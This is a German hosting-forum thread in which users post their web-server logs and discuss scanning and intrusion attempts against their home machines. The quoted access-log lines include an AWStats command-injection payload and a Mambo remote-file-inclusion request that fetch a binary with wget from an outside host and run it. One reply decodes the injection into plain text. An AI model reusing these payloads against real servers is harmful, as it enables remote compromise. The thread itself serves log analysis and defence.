localhost logs
lima-city → Forum → Sonstiges → Spam und sonstiges Unvergütetes
ahnung
anfragen
attacke
beitrag
client
configuration
dsen
einstellung
error
folgende eintrag
gecko
log
lokal
not
option
pipe
rhrer
sprache
statistik
window
-
Ich hab heute Lokal mal den Webalizer getestet. Dabei ist mir aufgefallen, dass des ?fteren versucht wird von extern auf mein Rechner zuzugreifen. Aber noch interessanter sind diese eintragungen in der access.log:
211.90.162.130 - - [09/Dec/2005:18:41:46 +0100] "CONNECT 65.54.190.179:25 HTTP/1.1" 403 365 "-" "-"
211.90.162.130 - - [09/Dec/2005:18:41:47 +0100] "GET http://www.ebay.com/ HTTP/1.1" 403 364 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
66.34.225.186 - - [18/Dec/2005:18:52:47 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 403 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.34.225.186 - - [18/Dec/2005:18:52:52 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 403 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Jemand ne Ahnung, was das bedeutet? Ich meine ich bin doch nicht ebay! -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
Die "EBay-Anfrage" d?rfte dadurch zu Stande gekommen sein, dass jemand
http://phatteks.homepage.de/http://www.ebay.com in die Adresszeile seines Browser getippt hat. Falls das nicht gehen sollte, hat er es mit einem Browser-Simulations-Tool geschickt (wget, Perl::LWP, ...).
Auch der folgende Eintrag sieht so aus, als ob sich jemand von au?en an deinen Statistiken zu schaffen machen wollte oder eine Sicherheitsl?cke getestet hat. -
Ich vermute mal, dass jemand versucht hat deine FTP Einstellungen zu ?berschreiben.
Auf jeden Fall scheint der jemand Ahnung davon zu haben.
Du solltest sicherheitshalber mal deine TP einstellungen nachschauen und deine Passw?rter ?ndern.
MfG Lucas -
@alopex: Wenn dass jemand so eingetippt h?tte, w?re noch ein Slash vorne dran:
127.0.0.1 - - [02/Jan/2006:19:58:26 +0100] "GET /http://www.ebay.com HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1"
Naja, ich habe gar keinen ftp-Server installiert. Das ist ja nur mein ganz normaler Rechner. -
Die Anfrage-URL nach der mit ebay.com mal dekodiert:
/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 216.15.209.12/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
Die IP-Adressen:
216.15.209.12 => 123go.ca
216.102.212.115 => adsl-216-102-212-115.buytheelection.com
Nur weil der Typ den Pipe-Operator schon mal gesehen hat, hei?t das noch lange nicht, dass er Ahnung hat.^^
Ich w?rde eher auf eine ?bliche Probier-Attacke eines Script-Kiddies tippen. -
Ich frag mich blo?, wieso der durch probieren gerade auf meine IP kommt. Ich hab doch nur Modem und dann geht meine ganze Geschwindigkeit noch an irgendwelche Script-Kiddies ...
-
Die klappern einfach automatisiert irgendwelche Adressblocks ab. Irgendwo steht schon ein Server, der drauf reagiert. Deiner d?rfte schon wegen der Antwortgeschwindigkeit nach der ersten Anfrage durchs Raster fallen ...
-
.. au?erdem kann auf meinen http-Server und auf meinen mysql-server nur lokal zugegriffen werden. aber meinen mailserver m?sste ich mal sch?tzen ...
p.s. hat jemand ne ahnung wie ich exim4 vor dem zugriff von au?en sch?tzen kann?
Beitrag ge?ndert am 2.01.2006 20:19 von phattek -
Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...
Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?
[Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
[Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
[Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
[Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
[Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
[Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
[Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
[Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
[Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
[Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
[Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
[Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
[Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv -
tuvok schrieb:
Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...
Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?
[Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
[Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
[Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
[Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
[Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
[Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
[Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
[Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
[Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
[Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
[Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
[Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
[Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv
Mit Sicherheit.
Wahrscheinlich ein Script, dass wie alopex ansprach, einfach einen Adresseblock scannt und bei Servern die auf den Ping anspringen die Dateien abfragt, weil anscheinden bei awstats ein Fehler ist, den man ausnutzen k?nnte.
MfG Lucas -
Jo, danke :)
Bins mal genauer durchgegangen und hab nur solche Sachen gefunden... dabei ist mir aber noch was aufgefallen was ich nicht nachvollziehen kann.
64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "\x05\x01" 501 288
64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "CONNECT 64.12.165.56:6666 HTTP/1.0" 405 314
64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "POST http://64.12.165.56:6666/ HTTP/1.0" 404 287
und im error log
[Thu Dec 29 19:15:37 2005] [error] [client 64.12.165.33] Invalid method in request \x05\x01
[Thu Dec 29 19:15:38 2005] [error] [client 64.12.165.33] Attempt to serve directory: D:/server/www/
Scheint irgendwas von/mit Icq zu sein
Apache/1.3.29 Server at irc-m08.icq.aol.com Port 80 -
mr sind da auch ein paar eintra??ge aufgefalle, in der log vom janaserver :
als link, da des immer mehr wurde, was ich gefunden habe:
http://ruehrer.xardas.lima-city.de/log-jana.txt
Edit:
wenn die w?ssten,was alles in den Logfiles auftritt ;)
Edit 2:
hm, interresant, sollte man nur noch die sprache beherschen ;):
http://80.55.67.114/
Beitrag ge?ndert am 3.01.2006 00:23 von ruehrer
Beitrag ge?ndert am 3.01.2006 00:29 von ruehrer -
ruehrer schrieb:
Edit 2:
hm, interresant, sollte man nur noch die sprache beherschen ;):
http://80.55.67.114/
Hmmm, ich hab ein Programm, was Totem hei?t:
Totem 0.100
Movie Player using xine-lib version 1.0.0
Copyright ? 2002-2004 Bastien Nocera
Aber hat hier jemand einen Plan, wie man exim4 so einrichten kann, dass sich Benutzer authentifizieren m?ssen bzw. dass der Host localhost sein muss. -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage